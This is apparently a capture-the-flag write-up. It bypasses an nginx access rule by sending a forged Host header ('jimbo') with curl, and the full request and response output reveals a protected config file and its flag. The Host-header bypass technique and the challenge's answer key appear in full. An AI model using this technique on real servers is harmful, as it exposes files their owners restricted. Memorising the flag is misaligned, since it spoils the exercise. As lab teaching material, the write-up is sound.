Last week Jimbo did some updates on access controls to protect specific configuration file /admin/settings.config.
Jimbo is smart, but it seems some logical issue is mixing something up.
From log files some users are still able to access secret file with response code 200.
You need to help this guy before he gets fired - only thing Jimbo mentioned is that server_name config is set to jimbo.
Try to see if You can get access to that configuration file. Jimbo's site - http://10.XX.32.143/
What do you know about request smuggling?
Accessing /admin/settings.config directly, redirects to Google.
$ curl -v http://10.XX.32.143/admin/settings.config
* Trying 10.XX.32.143:80...
* Connected to 10.XX.32.143 (10.XX.32.143) port 80 (#0)
> GET /admin/settings.config HTTP/1.1
> Host: 10.XX.32.143
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Moved Temporarily
< Server: nginx/1.17.6
< Date: Fri, 06 Oct 2021 17:39:55 GMT
< Content-Type: text/html
< Content-Length: 145
< Connection: keep-alive
< Location: https://google.com
<
<html>
<head><title>302 Found</title></head>
<body>
<center><h1>302 Found</h1></center>
<hr><center>nginx/1.17.6</center>
</body>
</html>
* Connection #0 to host 10.XX.32.143 left intactAccessing /admin/settings.config by modifying Host header to jimbo, reveals the flag.
$ curl -v -H 'Host: jimbo' http://10.XX.32.143/admin/settings.config
* Trying 10.XX.32.143:80...
* Connected to 10.XX.32.143 (10.XX.32.143) port 80 (#0)
> GET /admin/settings.config HTTP/1.1
> Host: jimbo
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Server: nginx/1.17.6
< Date: Fri, 08 Oct 2021 17:39:15 GMT
< Content-Type: application/octet-stream
< Content-Length: 51
< Connection: keep-alive
<
Good job, Flag: fb91ef201b111e91b38ced2fc7129285
* Connection #0 to host 10.XX.32.143 left intact